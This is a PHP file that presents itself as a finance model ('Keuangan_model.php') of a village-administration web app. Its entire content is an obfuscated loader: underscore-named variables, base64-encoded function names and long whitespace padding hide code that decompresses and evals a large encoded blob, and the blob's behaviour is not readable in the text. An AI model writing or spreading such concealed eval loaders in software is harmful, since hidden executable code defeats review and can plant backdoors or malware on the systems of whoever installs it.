<?php 
        $__='printf';$_='Loading donjo-app/models/Keuangan_model.php';
        















































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































































                                                                                                                                                                                                                     $________;
